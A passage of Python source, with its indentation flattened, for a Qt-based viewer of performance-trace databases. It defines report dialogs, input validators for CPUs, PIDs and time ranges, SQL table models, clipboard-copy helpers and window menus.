self.fetcher.Fetch(count)
else:
self.progress.emit(0)
return current
def HasMoreRecords(self):
return self.more
# Report Variables
class ReportVars():
def __init__(self, name = "", where_clause = "", limit = ""):
self.name = name
self.where_clause = where_clause
self.limit = limit
def UniqueId(self):
return str(self.where_clause + ";" + self.limit)
# Branch window
class BranchWindow(QMdiSubWindow):
def __init__(self, glb, event_id, report_vars, parent=None):
super(BranchWindow, self).__init__(parent)
model_name = "Branch Events " + str(event_id) + " " + report_vars.UniqueId()
self.model = LookupCreateModel(model_name, lambda: BranchModel(glb, event_id, report_vars.where_clause))
self.view = QTreeView()
self.view.setUniformRowHeights(True)
self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
self.view.CopyCellsToClipboard = CopyTreeCellsToClipboard
self.view.setModel(self.model)
self.ResizeColumnsToContents()
self.context_menu = TreeContextMenu(self.view)
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.model.root)
self.fetch_bar = FetchMoreRecordsBar(self.model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, report_vars.name + " Branch Events")
def ResizeColumnToContents(self, column, n):
# Using the view's resizeColumnToContents() here is extrememly slow
# so implement a crude alternative
mm = "MM" if column else "MMMM"
font = self.view.font()
metrics = QFontMetrics(font)
max = 0
for row in xrange(n):
val = self.model.root.child_items[row].data[column]
len = metrics.width(str(val) + mm)
max = len if len > max else max
val = self.model.columnHeader(column)
len = metrics.width(str(val) + mm)
max = len if len > max else max
self.view.setColumnWidth(column, max)
def ResizeColumnsToContents(self):
n = min(self.model.root.child_count, 100)
if n < 1:
# No data yet, so connect a signal to notify when there is
self.model.rowsInserted.connect(self.UpdateColumnWidths)
return
columns = self.model.columnCount()
for i in xrange(columns):
self.ResizeColumnToContents(i, n)
def UpdateColumnWidths(self, *x):
# This only needs to be done once, so disconnect the signal now
self.model.rowsInserted.disconnect(self.UpdateColumnWidths)
self.ResizeColumnsToContents()
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.index(row, 0, QModelIndex()))
else:
self.find_bar.NotFound()
# Line edit data item
class LineEditDataItem(object):
def __init__(self, glb, label, placeholder_text, parent, id = "", default = ""):
self.glb = glb
self.label = label
self.placeholder_text = placeholder_text
self.parent = parent
self.id = id
self.value = default
self.widget = QLineEdit(default)
self.widget.editingFinished.connect(self.Validate)
self.widget.textChanged.connect(self.Invalidate)
self.red = False
self.error = ""
self.validated = True
if placeholder_text:
self.widget.setPlaceholderText(placeholder_text)
def TurnTextRed(self):
if not self.red:
palette = QPalette()
palette.setColor(QPalette.Text,Qt.red)
self.widget.setPalette(palette)
self.red = True
def TurnTextNormal(self):
if self.red:
palette = QPalette()
self.widget.setPalette(palette)
self.red = False
def InvalidValue(self, value):
self.value = ""
self.TurnTextRed()
self.error = self.label + " invalid value '" + value + "'"
self.parent.ShowMessage(self.error)
def Invalidate(self):
self.validated = False
def DoValidate(self, input_string):
self.value = input_string.strip()
def Validate(self):
self.validated = True
self.error = ""
self.TurnTextNormal()
self.parent.ClearMessage()
input_string = self.widget.text()
if not len(input_string.strip()):
self.value = ""
return
self.DoValidate(input_string)
def IsValid(self):
if not self.validated:
self.Validate()
if len(self.error):
self.parent.ShowMessage(self.error)
return False
return True
def IsNumber(self, value):
try:
x = int(value)
except:
x = 0
return str(x) == value
# Non-negative integer ranges dialog data item
class NonNegativeIntegerRangesDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, column_name, parent):
super(NonNegativeIntegerRangesDataItem, self).__init__(glb, label, placeholder_text, parent)
self.column_name = column_name
def DoValidate(self, input_string):
singles = []
ranges = []
for value in [x.strip() for x in input_string.split(",")]:
if "-" in value:
vrange = value.split("-")
if len(vrange) != 2 or not self.IsNumber(vrange[0]) or not self.IsNumber(vrange[1]):
return self.InvalidValue(value)
ranges.append(vrange)
else:
if not self.IsNumber(value):
return self.InvalidValue(value)
singles.append(value)
ranges = [("(" + self.column_name + " >= " + r[0] + " AND " + self.column_name + " <= " + r[1] + ")") for r in ranges]
if len(singles):
ranges.append(self.column_name + " IN (" + ",".join(singles) + ")")
self.value = " OR ".join(ranges)
# Positive integer dialog data item
class PositiveIntegerDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, parent, id = "", default = ""):
super(PositiveIntegerDataItem, self).__init__(glb, label, placeholder_text, parent, id, default)
def DoValidate(self, input_string):
if not self.IsNumber(input_string.strip()):
return self.InvalidValue(input_string)
value = int(input_string.strip())
if value <= 0:
return self.InvalidValue(input_string)
self.value = str(value)
# Dialog data item converted and validated using a SQL table
class SQLTableDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, table_name, match_column, column_name1, column_name2, parent):
super(SQLTableDataItem, self).__init__(glb, label, placeholder_text, parent)
self.table_name = table_name
self.match_column = match_column
self.column_name1 = column_name1
self.column_name2 = column_name2
def ValueToIds(self, value):
ids = []
query = QSqlQuery(self.glb.db)
stmt = "SELECT id FROM " + self.table_name + " WHERE " + self.match_column + " = '" + value + "'"
ret = query.exec_(stmt)
if ret:
while query.next():
ids.append(str(query.value(0)))
return ids
def DoValidate(self, input_string):
all_ids = []
for value in [x.strip() for x in input_string.split(",")]:
ids = self.ValueToIds(value)
if len(ids):
all_ids.extend(ids)
else:
return self.InvalidValue(value)
self.value = self.column_name1 + " IN (" + ",".join(all_ids) + ")"
if self.column_name2:
self.value = "( " + self.value + " OR " + self.column_name2 + " IN (" + ",".join(all_ids) + ") )"
# Sample time ranges dialog data item converted and validated using 'samples' SQL table
class SampleTimeRangesDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, column_name, parent):
self.column_name = column_name
self.last_id = 0
self.first_time = 0
self.last_time = 2 ** 64
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, time FROM samples ORDER BY id DESC LIMIT 1")
if query.next():
self.last_id = int(query.value(0))
self.last_time = int(query.value(1))
QueryExec(query, "SELECT time FROM samples WHERE time != 0 ORDER BY id LIMIT 1")
if query.next():
self.first_time = int(query.value(0))
if placeholder_text:
placeholder_text += ", between " + str(self.first_time) + " and " + str(self.last_time)
super(SampleTimeRangesDataItem, self).__init__(glb, label, placeholder_text, parent)
def IdBetween(self, query, lower_id, higher_id, order):
QueryExec(query, "SELECT id FROM samples WHERE id > " + str(lower_id) + " AND id < " + str(higher_id) + " ORDER BY id " + order + " LIMIT 1")
if query.next():
return True, int(query.value(0))
else:
return False, 0
def BinarySearchTime(self, lower_id, higher_id, target_time, get_floor):
query = QSqlQuery(self.glb.db)
while True:
next_id = int((lower_id + higher_id) / 2)
QueryExec(query, "SELECT time FROM samples WHERE id = " + str(next_id))
if not query.next():
ok, dbid = self.IdBetween(query, lower_id, next_id, "DESC")
if not ok:
ok, dbid = self.IdBetween(query, next_id, higher_id, "")
if not ok:
return str(higher_id)
next_id = dbid
QueryExec(query, "SELECT time FROM samples WHERE id = " + str(next_id))
next_time = int(query.value(0))
if get_floor:
if target_time > next_time:
lower_id = next_id
else:
higher_id = next_id
if higher_id <= lower_id + 1:
return str(higher_id)
else:
if target_time >= next_time:
lower_id = next_id
else:
higher_id = next_id
if higher_id <= lower_id + 1:
return str(lower_id)
def ConvertRelativeTime(self, val):
mult = 1
suffix = val[-2:]
if suffix == "ms":
mult = 1000000
elif suffix == "us":
mult = 1000
elif suffix == "ns":
mult = 1
else:
return val
val = val[:-2].strip()
if not self.IsNumber(val):
return val
val = int(val) * mult
if val >= 0:
val += self.first_time
else:
val += self.last_time
return str(val)
def ConvertTimeRange(self, vrange):
if vrange[0] == "":
vrange[0] = str(self.first_time)
if vrange[1] == "":
vrange[1] = str(self.last_time)
vrange[0] = self.ConvertRelativeTime(vrange[0])
vrange[1] = self.ConvertRelativeTime(vrange[1])
if not self.IsNumber(vrange[0]) or not self.IsNumber(vrange[1]):
return False
beg_range = max(int(vrange[0]), self.first_time)
end_range = min(int(vrange[1]), self.last_time)
if beg_range > self.last_time or end_range < self.first_time:
return False
vrange[0] = self.BinarySearchTime(0, self.last_id, beg_range, True)
vrange[1] = self.BinarySearchTime(1, self.last_id + 1, end_range, False)
return True
def AddTimeRange(self, value, ranges):
n = value.count("-")
if n == 1:
pass
elif n == 2:
if value.split("-")[1].strip() == "":
n = 1
elif n == 3:
n = 2
else:
return False
pos = findnth(value, "-", n)
vrange = [value[:pos].strip() ,value[pos+1:].strip()]
if self.ConvertTimeRange(vrange):
ranges.append(vrange)
return True
return False
def DoValidate(self, input_string):
ranges = []
for value in [x.strip() for x in input_string.split(",")]:
if not self.AddTimeRange(value, ranges):
return self.InvalidValue(value)
ranges = [("(" + self.column_name + " >= " + r[0] + " AND " + self.column_name + " <= " + r[1] + ")") for r in ranges]
self.value = " OR ".join(ranges)
# Report Dialog Base
class ReportDialogBase(QDialog):
def __init__(self, glb, title, items, partial, parent=None):
super(ReportDialogBase, self).__init__(parent)
self.glb = glb
self.report_vars = ReportVars()
self.setWindowTitle(title)
self.setMinimumWidth(600)
self.data_items = [x(glb, self) for x in items]
self.partial = partial
self.grid = QGridLayout()
for row in xrange(len(self.data_items)):
self.grid.addWidget(QLabel(self.data_items[row].label), row, 0)
self.grid.addWidget(self.data_items[row].widget, row, 1)
self.status = QLabel()
self.ok_button = QPushButton("Ok", self)
self.ok_button.setDefault(True)
self.ok_button.released.connect(self.Ok)
self.ok_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.cancel_button = QPushButton("Cancel", self)
self.cancel_button.released.connect(self.reject)
self.cancel_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.hbox = QHBoxLayout()
#self.hbox.addStretch()
self.hbox.addWidget(self.status)
self.hbox.addWidget(self.ok_button)
self.hbox.addWidget(self.cancel_button)
self.vbox = QVBoxLayout()
self.vbox.addLayout(self.grid)
self.vbox.addLayout(self.hbox)
self.setLayout(self.vbox);
def Ok(self):
vars = self.report_vars
for d in self.data_items:
if d.id == "REPORTNAME":
vars.name = d.value
if not vars.name:
self.ShowMessage("Report name is required")
return
for d in self.data_items:
if not d.IsValid():
return
for d in self.data_items[1:]:
if d.id == "LIMIT":
vars.limit = d.value
elif len(d.value):
if len(vars.where_clause):
vars.where_clause += " AND "
vars.where_clause += d.value
if len(vars.where_clause):
if self.partial:
vars.where_clause = " AND ( " + vars.where_clause + " ) "
else:
vars.where_clause = " WHERE " + vars.where_clause + " "
self.accept()
def ShowMessage(self, msg):
self.status.setText("<font color=#FF0000>" + msg)
def ClearMessage(self):
self.status.setText("")
# Selected branch report creation dialog
class SelectedBranchDialog(ReportDialogBase):
def __init__(self, glb, parent=None):
title = "Selected Branches"
items = (lambda g, p: LineEditDataItem(g, "Report name:", "Enter a name to appear in the window title bar", p, "REPORTNAME"),
lambda g, p: SampleTimeRangesDataItem(g, "Time ranges:", "Enter time ranges", "samples.id", p),
lambda g, p: NonNegativeIntegerRangesDataItem(g, "CPUs:", "Enter CPUs or ranges e.g. 0,5-6", "cpu", p),
lambda g, p: SQLTableDataItem(g, "Commands:", "Only branches with these commands will be included", "comms", "comm", "comm_id", "", p),
lambda g, p: SQLTableDataItem(g, "PIDs:", "Only branches with these process IDs will be included", "threads", "pid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "TIDs:", "Only branches with these thread IDs will be included", "threads", "tid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "DSOs:", "Only branches with these DSOs will be included", "dsos", "short_name", "samples.dso_id", "to_dso_id", p),
lambda g, p: SQLTableDataItem(g, "Symbols:", "Only branches with these symbols will be included", "symbols", "name", "symbol_id", "to_symbol_id", p),
lambda g, p: LineEditDataItem(g, "Raw SQL clause: ", "Enter a raw SQL WHERE clause", p))
super(SelectedBranchDialog, self).__init__(glb, title, items, True, parent)
# Event list
def GetEventList(db):
events = []
query = QSqlQuery(db)
QueryExec(query, "SELECT name FROM selected_events WHERE id > 0 ORDER BY id")
while query.next():
events.append(query.value(0))
return events
# Is a table selectable
def IsSelectable(db, table, sql = ""):
query = QSqlQuery(db)
try:
QueryExec(query, "SELECT * FROM " + table + " " + sql + " LIMIT 1")
except:
return False
return True
# SQL table data model item
class SQLTableItem():
def __init__(self, row, data):
self.row = row
self.data = data
def getData(self, column):
return self.data[column]
# SQL table data model
class SQLTableModel(TableModel):
progress = Signal(object)
def __init__(self, glb, sql, column_headers, parent=None):
super(SQLTableModel, self).__init__(parent)
self.glb = glb
self.more = True
self.populated = 0
self.column_headers = column_headers
self.fetcher = SQLFetcher(glb, sql, lambda x, y=len(column_headers): self.SQLTableDataPrep(x, y), self.AddSample)
self.fetcher.done.connect(self.Update)
self.fetcher.Fetch(glb_chunk_sz)
def DisplayData(self, item, index):
self.FetchIfNeeded(item.row)
return item.getData(index.column())
def AddSample(self, data):
child = SQLTableItem(self.populated, data)
self.child_items.append(child)
self.populated += 1
def Update(self, fetched):
if not fetched:
self.more = False
self.progress.emit(0)
child_count = self.child_count
count = self.populated - child_count
if count > 0:
parent = QModelIndex()
self.beginInsertRows(parent, child_count, child_count + count - 1)
self.insertRows(child_count, count, parent)
self.child_count += count
self.endInsertRows()
self.progress.emit(self.child_count)
def FetchMoreRecords(self, count):
current = self.child_count
if self.more:
self.fetcher.Fetch(count)
else:
self.progress.emit(0)
return current
def HasMoreRecords(self):
return self.more
def columnCount(self, parent=None):
return len(self.column_headers)
def columnHeader(self, column):
return self.column_headers[column]
def SQLTableDataPrep(self, query, count):
data = []
for i in xrange(count):
data.append(query.value(i))
return data
# SQL automatic table data model
class SQLAutoTableModel(SQLTableModel):
def __init__(self, glb, table_name, parent=None):
sql = "SELECT * FROM " + table_name + " WHERE id > $$last_id$$ ORDER BY id LIMIT " + str(glb_chunk_sz)
if table_name == "comm_threads_view":
# For now, comm_threads_view has no id column
sql = "SELECT * FROM " + table_name + " WHERE comm_id > $$last_id$$ ORDER BY comm_id LIMIT " + str(glb_chunk_sz)
column_headers = []
query = QSqlQuery(glb.db)
if glb.dbref.is_sqlite3:
QueryExec(query, "PRAGMA table_info(" + table_name + ")")
while query.next():
column_headers.append(query.value(1))
if table_name == "sqlite_master":
sql = "SELECT * FROM " + table_name
else:
if table_name[:19] == "information_schema.":
sql = "SELECT * FROM " + table_name
select_table_name = table_name[19:]
schema = "information_schema"
else:
select_table_name = table_name
schema = "public"
QueryExec(query, "SELECT column_name FROM information_schema.columns WHERE table_schema = '" + schema + "' and table_name = '" + select_table_name + "'")
while query.next():
column_headers.append(query.value(0))
if pyside_version_1 and sys.version_info[0] == 3:
if table_name == "samples_view":
self.SQLTableDataPrep = self.samples_view_DataPrep
if table_name == "samples":
self.SQLTableDataPrep = self.samples_DataPrep
super(SQLAutoTableModel, self).__init__(glb, sql, column_headers, parent)
def samples_view_DataPrep(self, query, count):
data = []
data.append(query.value(0))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(1)))
for i in xrange(2, count):
data.append(query.value(i))
return data
def samples_DataPrep(self, query, count):
data = []
for i in xrange(9):
data.append(query.value(i))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(9)))
for i in xrange(10, count):
data.append(query.value(i))
return data
# Base class for custom ResizeColumnsToContents
class ResizeColumnsToContentsBase(QObject):
def __init__(self, parent=None):
super(ResizeColumnsToContentsBase, self).__init__(parent)
def ResizeColumnToContents(self, column, n):
# Using the view's resizeColumnToContents() here is extrememly slow
# so implement a crude alternative
font = self.view.font()
metrics = QFontMetrics(font)
max = 0
for row in xrange(n):
val = self.data_model.child_items[row].data[column]
len = metrics.width(str(val) + "MM")
max = len if len > max else max
val = self.data_model.columnHeader(column)
len = metrics.width(str(val) + "MM")
max = len if len > max else max
self.view.setColumnWidth(column, max)
def ResizeColumnsToContents(self):
n = min(self.data_model.child_count, 100)
if n < 1:
# No data yet, so connect a signal to notify when there is
self.data_model.rowsInserted.connect(self.UpdateColumnWidths)
return
columns = self.data_model.columnCount()
for i in xrange(columns):
self.ResizeColumnToContents(i, n)
def UpdateColumnWidths(self, *x):
# This only needs to be done once, so disconnect the signal now
self.data_model.rowsInserted.disconnect(self.UpdateColumnWidths)
self.ResizeColumnsToContents()
# Convert value to CSV
def ToCSValue(val):
if '"' in val:
val = val.replace('"', '""')
if "," in val or '"' in val:
val = '"' + val + '"'
return val
# Key to sort table model indexes by row / column, assuming fewer than 1000 columns
glb_max_cols = 1000
def RowColumnKey(a):
return a.row() * glb_max_cols + a.column()
# Copy selected table cells to clipboard
def CopyTableCellsToClipboard(view, as_csv=False, with_hdr=False):
indexes = sorted(view.selectedIndexes(), key=RowColumnKey)
idx_cnt = len(indexes)
if not idx_cnt:
return
if idx_cnt == 1:
with_hdr=False
min_row = indexes[0].row()
max_row = indexes[0].row()
min_col = indexes[0].column()
max_col = indexes[0].column()
for i in indexes:
min_row = min(min_row, i.row())
max_row = max(max_row, i.row())
min_col = min(min_col, i.column())
max_col = max(max_col, i.column())
if max_col > glb_max_cols:
raise RuntimeError("glb_max_cols is too low")
max_width = [0] * (1 + max_col - min_col)
for i in indexes:
c = i.column() - min_col
max_width[c] = max(max_width[c], len(str(i.data())))
text = ""
pad = ""
sep = ""
if with_hdr:
model = indexes[0].model()
for col in range(min_col, max_col + 1):
val = model.headerData(col, Qt.Horizontal)
if as_csv:
text += sep + ToCSValue(val)
sep = ","
else:
c = col - min_col
max_width[c] = max(max_width[c], len(val))
width = max_width[c]
align = model.headerData(col, Qt.Horizontal, Qt.TextAlignmentRole)
if align & Qt.AlignRight:
val = val.rjust(width)
text += pad + sep + val
pad = " " * (width - len(val))
sep = " "
text += "\n"
pad = ""
sep = ""
last_row = min_row
for i in indexes:
if i.row() > last_row:
last_row = i.row()
text += "\n"
pad = ""
sep = ""
if as_csv:
text += sep + ToCSValue(str(i.data()))
sep = ","
else:
width = max_width[i.column() - min_col]
if i.data(Qt.TextAlignmentRole) & Qt.AlignRight:
val = str(i.data()).rjust(width)
else:
val = str(i.data())
text += pad + sep + val
pad = " " * (width - len(val))
sep = " "
QApplication.clipboard().setText(text)
def CopyTreeCellsToClipboard(view, as_csv=False, with_hdr=False):
indexes = view.selectedIndexes()
if not len(indexes):
return
selection = view.selectionModel()
first = None
for i in indexes:
above = view.indexAbove(i)
if not selection.isSelected(above):
first = i
break
if first is None:
raise RuntimeError("CopyTreeCellsToClipboard internal error")
model = first.model()
row_cnt = 0
col_cnt = model.columnCount(first)
max_width = [0] * col_cnt
indent_sz = 2
indent_str = " " * indent_sz
expanded_mark_sz = 2
if sys.version_info[0] == 3:
expanded_mark = "\u25BC "
not_expanded_mark = "\u25B6 "
else:
expanded_mark = unicode(chr(0xE2) + chr(0x96) + chr(0xBC) + " ", "utf-8")
not_expanded_mark = unicode(chr(0xE2) + chr(0x96) + chr(0xB6) + " ", "utf-8")
leaf_mark = " "
if not as_csv:
pos = first
while True:
row_cnt += 1
row = pos.row()
for c in range(col_cnt):
i = pos.sibling(row, c)
if c:
n = len(str(i.data()))
else:
n = len(str(i.data()).strip())
n += (i.internalPointer().level - 1) * indent_sz
n += expanded_mark_sz
max_width[c] = max(max_width[c], n)
pos = view.indexBelow(pos)
if not selection.isSelected(pos):
break
text = ""
pad = ""
sep = ""
if with_hdr:
for c in range(col_cnt):
val = model.headerData(c, Qt.Horizontal, Qt.DisplayRole).strip()
if as_csv:
text += sep + ToCSValue(val)
sep = ","
else:
max_width[c] = max(max_width[c], len(val))
width = max_width[c]
align = model.headerData(c, Qt.Horizontal, Qt.TextAlignmentRole)
if align & Qt.AlignRight:
val = val.rjust(width)
text += pad + sep + val
pad = " " * (width - len(val))
sep = " "
text += "\n"
pad = ""
sep = ""
pos = first
while True:
row = pos.row()
for c in range(col_cnt):
i = pos.sibling(row, c)
val = str(i.data())
if not c:
if model.hasChildren(i):
if view.isExpanded(i):
mark = expanded_mark
else:
mark = not_expanded_mark
else:
mark = leaf_mark
val = indent_str * (i.internalPointer().level - 1) + mark + val.strip()
if as_csv:
text += sep + ToCSValue(val)
sep = ","
else:
width = max_width[c]
if c and i.data(Qt.TextAlignmentRole) & Qt.AlignRight:
val = val.rjust(width)
text += pad + sep + val
pad = " " * (width - len(val))
sep = " "
pos = view.indexBelow(pos)
if not selection.isSelected(pos):
break
text = text.rstrip() + "\n"
pad = ""
sep = ""
QApplication.clipboard().setText(text)
def CopyCellsToClipboard(view, as_csv=False, with_hdr=False):
view.CopyCellsToClipboard(view, as_csv, with_hdr)
def CopyCellsToClipboardHdr(view):
CopyCellsToClipboard(view, False, True)
def CopyCellsToClipboardCSV(view):
CopyCellsToClipboard(view, True, True)
# Context menu
class ContextMenu(object):
def __init__(self, view):
self.view = view
self.view.setContextMenuPolicy(Qt.CustomContextMenu)
self.view.customContextMenuRequested.connect(self.ShowContextMenu)
def ShowContextMenu(self, pos):
menu = QMenu(self.view)
self.AddActions(menu)
menu.exec_(self.view.mapToGlobal(pos))
def AddCopy(self, menu):
menu.addAction(CreateAction("&Copy selection", "Copy to clipboard", lambda: CopyCellsToClipboardHdr(self.view), self.view))
menu.addAction(CreateAction("Copy selection as CS&V", "Copy to clipboard as CSV", lambda: CopyCellsToClipboardCSV(self.view), self.view))
def AddActions(self, menu):
self.AddCopy(menu)
class TreeContextMenu(ContextMenu):
def __init__(self, view):
super(TreeContextMenu, self).__init__(view)
def AddActions(self, menu):
i = self.view.currentIndex()
text = str(i.data()).strip()
if len(text):
menu.addAction(CreateAction('Copy "' + text + '"', "Copy to clipboard", lambda: QApplication.clipboard().setText(text), self.view))
self.AddCopy(menu)
# Table window
class TableWindow(QMdiSubWindow, ResizeColumnsToContentsBase):
def __init__(self, glb, table_name, parent=None):
super(TableWindow, self).__init__(parent)
self.data_model = LookupCreateModel(table_name + " Table", lambda: SQLAutoTableModel(glb, table_name))
self.model = QSortFilterProxyModel()
self.model.setSourceModel(self.data_model)
self.view = QTableView()
self.view.setModel(self.model)
self.view.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.view.verticalHeader().setVisible(False)
self.view.sortByColumn(-1, Qt.AscendingOrder)
self.view.setSortingEnabled(True)
self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
self.view.CopyCellsToClipboard = CopyTableCellsToClipboard
self.ResizeColumnsToContents()
self.context_menu = ContextMenu(self.view)
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.data_model)
self.fetch_bar = FetchMoreRecordsBar(self.data_model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, table_name + " Table")
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.mapFromSource(self.data_model.index(row, 0, QModelIndex())))
else:
self.find_bar.NotFound()
# Table list
def GetTableList(glb):
tables = []
query = QSqlQuery(glb.db)
if glb.dbref.is_sqlite3:
QueryExec(query, "SELECT name FROM sqlite_master WHERE type IN ( 'table' , 'view' ) ORDER BY name")
else:
QueryExec(query, "SELECT table_name FROM information_schema.tables WHERE table_schema = 'public' AND table_type IN ( 'BASE TABLE' , 'VIEW' ) ORDER BY table_name")
while query.next():
tables.append(query.value(0))
if glb.dbref.is_sqlite3:
tables.append("sqlite_master")
else:
tables.append("information_schema.tables")
tables.append("information_schema.views")
tables.append("information_schema.columns")
return tables
# Top Calls data model
class TopCallsModel(SQLTableModel):
def __init__(self, glb, report_vars, parent=None):
text = ""
if not glb.dbref.is_sqlite3:
text = "::text"
limit = ""
if len(report_vars.limit):
limit = " LIMIT " + report_vars.limit
sql = ("SELECT comm, pid, tid, name,"
" CASE"
" WHEN (short_name = '[kernel.kallsyms]') THEN '[kernel]'" + text +
" ELSE short_name"
" END AS dso,"
" call_time, return_time, (return_time - call_time) AS elapsed_time, branch_count, "
" CASE"
" WHEN (calls.flags = 1) THEN 'no call'" + text +
" WHEN (calls.flags = 2) THEN 'no return'" + text +
" WHEN (calls.flags = 3) THEN 'no call/return'" + text +
" ELSE ''" + text +
" END AS flags"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" INNER JOIN comms ON calls.comm_id = comms.id"
" INNER JOIN threads ON calls.thread_id = threads.id" +
report_vars.where_clause +
" ORDER BY elapsed_time DESC" +
limit
)
column_headers = ("Command", "PID", "TID", "Symbol", "Object", "Call Time", "Return Time", "Elapsed Time (ns)", "Branch Count", "Flags")
self.alignment = (Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignLeft)
super(TopCallsModel, self).__init__(glb, sql, column_headers, parent)
def columnAlignment(self, column):
return self.alignment[column]
# Top Calls report creation dialog
class TopCallsDialog(ReportDialogBase):
def __init__(self, glb, parent=None):
title = "Top Calls by Elapsed Time"
items = (lambda g, p: LineEditDataItem(g, "Report name:", "Enter a name to appear in the window title bar", p, "REPORTNAME"),
lambda g, p: SQLTableDataItem(g, "Commands:", "Only calls with these commands will be included", "comms", "comm", "comm_id", "", p),
lambda g, p: SQLTableDataItem(g, "PIDs:", "Only calls with these process IDs will be included", "threads", "pid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "TIDs:", "Only calls with these thread IDs will be included", "threads", "tid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "DSOs:", "Only calls with these DSOs will be included", "dsos", "short_name", "dso_id", "", p),
lambda g, p: SQLTableDataItem(g, "Symbols:", "Only calls with these symbols will be included", "symbols", "name", "symbol_id", "", p),
lambda g, p: LineEditDataItem(g, "Raw SQL clause: ", "Enter a raw SQL WHERE clause", p),
lambda g, p: PositiveIntegerDataItem(g, "Record limit:", "Limit selection to this number of records", p, "LIMIT", "100"))
super(TopCallsDialog, self).__init__(glb, title, items, False, parent)
# Top Calls window
class TopCallsWindow(QMdiSubWindow, ResizeColumnsToContentsBase):
def __init__(self, glb, report_vars, parent=None):
super(TopCallsWindow, self).__init__(parent)
self.data_model = LookupCreateModel("Top Calls " + report_vars.UniqueId(), lambda: TopCallsModel(glb, report_vars))
self.model = self.data_model
self.view = QTableView()
self.view.setModel(self.model)
self.view.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.view.verticalHeader().setVisible(False)
self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
self.view.CopyCellsToClipboard = CopyTableCellsToClipboard
self.context_menu = ContextMenu(self.view)
self.ResizeColumnsToContents()
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.model)
self.fetch_bar = FetchMoreRecordsBar(self.data_model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, report_vars.name)
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.index(row, 0, QModelIndex()))
else:
self.find_bar.NotFound()
# Action Definition
def CreateAction(label, tip, callback, parent=None, shortcut=None):
action = QAction(label, parent)
if shortcut != None:
action.setShortcuts(shortcut)
action.setStatusTip(tip)
action.triggered.connect(callback)
return action
# Typical application actions
def CreateExitAction(app, parent=None):
return CreateAction("&Quit", "Exit the application", app.closeAllWindows, parent, QKeySequence.Quit)
# Typical MDI actions
def CreateCloseActiveWindowAction(mdi_area):
return CreateAction("Cl&ose", "Close the active window", mdi_area.closeActiveSubWindow, mdi_area)
def CreateCloseAllWindowsAction(mdi_area):
return CreateAction("Close &All", "Close all the windows", mdi_area.closeAllSubWindows, mdi_area)
def CreateTileWindowsAction(mdi_area):
return CreateAction("&Tile", "Tile the windows", mdi_area.tileSubWindows, mdi_area)
def CreateCascadeWindowsAction(mdi_area):
return CreateAction("&Cascade", "Cascade the windows", mdi_area.cascadeSubWindows, mdi_area)
def CreateNextWindowAction(mdi_area):
return CreateAction("Ne&xt", "Move the focus to the next window", mdi_area.activateNextSubWindow, mdi_area, QKeySequence.NextChild)
def CreatePreviousWindowAction(mdi_area):
return CreateAction("Pre&vious", "Move the focus to the previous window", mdi_area.activatePreviousSubWindow, mdi_area, QKeySequence.PreviousChild)
# Typical MDI window menu
class WindowMenu():
def __init__(self, mdi_area, menu):
self.mdi_area = mdi_area
self.window_menu = menu.addMenu("&Windows")
self.close_active_window = CreateCloseActiveWindowAction(mdi_area)
self.close_all_windows = CreateCloseAllWindowsAction(mdi_area)
self.tile_windows = CreateTileWindowsAction(mdi_area)
self.cascade_windows = CreateCascadeWindowsAction(mdi_area)
self.next_window = CreateNextWindowAction(mdi_area)
self.previous_window = CreatePreviousWindowAction(mdi_area)
self.window_menu.aboutToShow.connect(self.Update)
def Update(self):
self.window_menu.clear()
sub_window_count = len(self.mdi_area.subWindowList())
have_sub_windows = sub_window_count != 0
self.close_active_window.setEnabled(have_sub_windows)
self.close_all_windows.setEnabled(have_sub_windows)
self.tile_windows.setEnabled(have_sub_windows)
self.cascade_windows.setEnabled(have_sub_windows)
self.next_window.setEnabled(have_sub_windows)
self.previous_window.setEnabled(have_sub_windows)
